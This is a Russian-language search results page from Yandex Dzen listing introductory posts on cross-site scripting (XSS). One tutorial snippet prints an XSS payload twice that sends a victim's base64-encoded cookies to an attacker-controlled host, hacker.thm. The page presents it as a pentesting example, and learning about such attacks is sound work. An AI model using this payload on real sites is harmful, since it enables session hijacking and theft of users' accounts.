xss это | Дзен

1 подписчик

Что такое XSS-уязвимость? XSS-уязвимость - это уязвимость, которая заключается во внедрении кода, исполняемого на стороне клиента в веб-страницу, которую просматривают другие пользователи. Существует два типа XSS-уязвимостей - активная и пассивная. Активная уязвимость более опасна, чем пассивная, потому что злоумышленнику не нужно заманивать жертву перейти по специальной ссылке, ему достаточно внедрить вредоносный код в базу или файл на сервере. Таким образом, все посетители сайта автоматически становятся жертвами. Код также может быть интегрирован, например, с помощью SQL-внедрений. Поэтому не...

4 года назад

Хакер | Этичный хакинг с Михаилом Тарасовым (Timcore)

2K подписчиков

Что такое уязвимость XSS (cross site scripting)? Типы XSS.

Давайте поговорим об уязвимости XSS, что расшифровывается как Cross Site Scripting или Межсайтовый Скриптинг. Данный тип уязвимостей позволяет атакующему внедрять JavaScript код на страницу, что делает ее очень опасным видом атак...

3 года назад

💣XSS уязвимости на примере💣

Всем Асап! Сегодня я расскажу Вам про XSS на примере и постараюсь объяснить все тонкости, которые можно уместить в три поста. Итак начнем!

#Что такое XSS

XSS или же Cross-site scripting это атака которая позволяет Вам встроить java code в сайт а иногда даже в его базу данных, что может повлечь серьезные проблемы.

#Полезная нагрузка

Для внедрения XSS используются полезные нагрузки. Это готовые строчки кода, которые упрощают пентестеру жизнь. Давайте рассмотрим примеры полезных нагрузок.

1. Кража сеанса:

Детали сеанса пользователя, такие как токены входа, часто хранятся в файлах cookie на целевом компьютере. Приведенный ниже JavaScript принимает целевой файл cookie, base64 кодирует файл cookie для обеспечения успешной передачи и затем отправляет его на веб-сайт под контролем хакера для регистрации. Как только хакер получит эти файлы cookie, он сможет захватить сеанс цели и войти в систему как этот пользователь.

💣<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

2. Key Logger:

Приведенный ниже код действует как регистратор ключей. Это означает, что все, что вы вводите на веб-странице, будет перенаправлено на веб-сайт, находящийся под контролем хакера. Это могло быть очень опасно, если бы полезная нагрузка веб-сайта была установлена на разрешенных логинах пользователей или данных кредитной карты.

Пост взят с моего канала в Telegram t.me/...hon

💣XSS уязвимости на примере💣

#Что такое XSS

#Полезная нагрузка

1. Кража сеанса:

💣<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>

2. Key Logger:

Пост взят с моего канала в Telegram t.me/...hon

...ещё

3 года назад

Также ищут

клиринг это пвп это выпрашивать это заказчики это ивент это

CISOCLUB - информационная безопасность

7,8K подписчиков

Руководство по осуществлению Cross-Site Scripting (XSS)

В этой статье пойдет речь о межсайтовом скриптинге (XSS).

3 года назад